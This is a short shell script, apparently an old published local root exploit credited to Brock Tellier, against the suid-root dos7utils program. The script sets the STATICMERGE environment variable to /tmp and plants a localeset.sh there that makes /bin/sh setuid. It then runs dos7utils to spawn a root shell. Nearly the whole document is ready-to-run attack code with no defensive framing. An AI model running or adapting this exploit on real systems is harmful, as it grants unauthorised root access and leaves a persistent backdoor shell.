#!/bin/sh
#
#  A vulnerability exists in the /usr/lib/merge/dos7utils
# program  (suid root  by default)  which allows any user
# to execute any command as root.
#
#  The dos7utils program gets its localeset.sh exec path
# from the environment variable STATICMERGE.  By setting
# this to a directory writable by us and setting the -f
# switch, we can have dos7utils run our program as follows:
#
#                                         ..Brock Tellier

uname -a; id; pwd
export STATICMERGE=/tmp

cat > /tmp/localeset.sh << 'EOF'
#!/bin/sh
id
chmod +s /bin/sh
EOF

chmod 700 /tmp/localeset.sh 
./dos7utils -f bah
/bin/sh

#                 www.hack.co.za           [2000]#